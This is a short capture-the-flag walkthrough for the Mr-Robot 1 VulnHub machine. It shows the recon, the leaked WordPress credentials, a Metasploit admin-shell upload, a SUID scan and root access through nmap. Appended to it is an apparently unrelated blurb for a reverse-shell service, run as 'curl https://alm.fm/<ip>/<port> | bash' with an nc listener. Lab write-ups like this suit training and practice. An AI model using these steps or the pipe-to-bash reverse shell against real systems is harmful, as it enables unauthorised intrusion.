Mr-Robot 1 (VulnHub)

https://www.vulnhub.com/entry/mr-robot-1,151/
---
https://192.168.1.240/robots.txt


User-agent: *
fsocity.dic
key-1-of-3.txt
---
https://192.168.1.240/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
---
cat fsocity.dic | sort | uniq -c | sort -hr | tail -15
     75 002
     75 001
     75 000080
     75 000000
     75 000
      1 uHack
      1 psychedelic
      1 imhack
      1 iamalearn
      1 ER28-0652
      1 c3fcd3d76192e4007dfb496cca67e13b (another key?)
      1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
      1 abcdefghijklmnopq
      1 abcdEfghijklmnop
      1 abcdefghijklmno
---
http://192.168.1.240/wp-login.php

elliot
ER28-0652
---
use exploit/unix/webapp/wp_admin_shell_upload

python -c 'import pty;pty.spawn("/bin/bash")'
su robot (Google md5 value)
---
robot@linux:~$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
---
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f95
---
find / -perm +6000 -type f -ls 2>/dev/null
 15068   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
 15093   68 -rwsr-xr-x   1 root     root        69120 Feb 12  2015 /bin/umount
 15060   96 -rwsr-xr-x   1 root     root        94792 Feb 12  2015 /bin/mount
 15069   44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
 15085   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-touchlock
 36231   48 -rwsr-xr-x   1 root     root        47032 Feb 17  2014 /usr/bin/passwd
 36216   32 -rwsr-xr-x   1 root     root        32464 Feb 17  2014 /usr/bin/newgrp
 36298  412 -rwxr-sr-x   1 root     utmp       421768 Nov  7  2013 /usr/bin/screen
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-unlock
 36202   16 -rwxr-sr-x   3 root     mail        14592 Dec  3  2012 /usr/bin/mail-lock
 36041   44 -rwsr-xr-x   1 root     root        41336 Feb 17  2014 /usr/bin/chsh
 36056   36 -rwxr-sr-x   1 root     crontab     35984 Feb  9  2013 /usr/bin/crontab
 36038   48 -rwsr-xr-x   1 root     root        46424 Feb 17  2014 /usr/bin/chfn
 36034   56 -rwxr-sr-x   1 root     shadow      54968 Feb 17  2014 /usr/bin/chage
 36148   68 -rwsr-xr-x   1 root     root        68152 Feb 17  2014 /usr/bin/gpasswd
 36112   24 -rwxr-sr-x   1 root     shadow      23360 Feb 17  2014 /usr/bin/expiry
 36080   16 -rwxr-sr-x   1 root     mail        14856 Dec  7  2013 /usr/bin/dotlockfile
 36349  152 -rwsr-xr-x   1 root     root       155008 Mar 12  2015 /usr/bin/sudo
 36337  280 -rwxr-sr-x   1 root     ssh        284784 May 12  2014 /usr/bin/ssh-agent
 36388   20 -rwxr-sr-x   1 root     tty         19024 Feb 12  2015 /usr/bin/wall
 34835  496 -rwsr-xr-x   1 root     root       504736 Nov 13  2015 /usr/local/bin/nmap
...
---
robot@linux:~$ nmap -iL /root/key-3-of-3.txt localhost
nmap -iL /root/key-3-of-3.txt localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2016-09-11 11:25 UTC
Failed to resolve given hostname/IP: 04787ddef27c3dee1ee161b21670b4e4.
Note that you can't use '/mask' AND '[1-4,7,100-]' style IP ranges
WARNING: No targets were specified, so 0 hosts scanned.
Nmap finished: 0 IP addresses (0 hosts up) scanned in 0.314 seconds
robot@linux:~$

alm.fm

I have created a tool which will try and establish a reverse shell to a nominated IP address and port using the following binaries (in order).

  1. bash
  2. nc
  3. ruby
  4. php
  5. python
To use this tool run the following on the target host:
curl https://alm.fm/<your-ip>/<your-port> | bash

On your machine make sure you have something like this running:
nc -l -p <your-port>
This should save you some time when performing engagements and you have a web shell or similar. It's worth noting that the target will attempt to make a TCP connection outbound, which may be picked up.

Be aware that curl XXXX | bash is seen as bad practice these days (when was it ever a good idea?), but in this case it's convenient. You can grab the PHP code here.